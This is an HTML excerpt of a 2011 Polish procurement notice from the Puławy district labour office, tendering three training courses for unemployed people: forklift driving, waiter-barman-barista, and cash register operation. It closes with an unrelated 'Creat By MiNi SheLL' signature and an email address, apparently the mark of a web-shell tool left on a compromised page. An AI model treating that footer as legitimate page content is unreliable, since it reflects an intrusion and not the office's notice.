<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWY URZĄD PRACY, UL. LUBELSKA 2G, POK.203, 24-100 PUŁAWY,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 09:00, miejsce: POWIATOWY URZĄD PRACY, UL. LUBELSKA 2G, POK. 205 (SEKRETARIAT), 24-100 PUŁAWY.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie współfinansowane będzie przez unię Europejską w ramach Europejskiego       Funduszu Społecznego, realizowane w ramach projektu KROK DO SUKCESU - Pod działanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu 	aktywności zawodowej osób bezrobotnych, Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja usługi szkoleniowej dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Puławach z zakresu KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM.
Liczba uczestników szkolenia: 24 osoby (dwie grupy po 12 osób każda)
Liczba godzin szkolenia:
I GRUPA: 124 godziny zajęć ogółem, 79 godzin na jednego uczestnika,
II GRUPA: 124 godziny zajęć ogółem, 79 godzin na jednego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 08.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 15</li>
<li>3. Doświadczenie zawodowe osób, które będą realizować zamówienie - 20</li>
<li>4. Posiadanie przez wykonawcę certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KELNER-BARMAN-BARISTA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja usługi szkoleniowej dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Puławach z zakresu KELNER-BARMAN-BARISTA.
Liczba uczestników szkolenia: 10 osób 
Liczba godzin szkolenia: 160 godzin zegarowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 08.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 15</li>
<li>3. Doświadczenie zawodowe osób, które będą realizować zamówienie - 20</li>
<li>4. Posiadanie przez wykonawcę certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> OBSŁUGA KASY FISKALNEJ, TERMINALA KART PŁATNICZYCH I MINIMUM SANITARNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja usługi szkoleniowej dla osób bezrobotnych  zarejestrowanych w Powiatowym Urzędzie Pracy w Puławach z zakresu OBSŁUGI KASY FISKALNEJ, TERMINALA KART PŁATNICZYCH I MINIMUM SANITARNE.
Liczba uczestników szkolenia: 15 osób
Liczba godzin szkolenia: 50 godzin zegarowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 08.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 15</li>
<li>3. Doświadczenie zawodowe osób, które będą realizować zamówienie - 20</li>
<li>4. Posiadanie przez wykonawcę certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com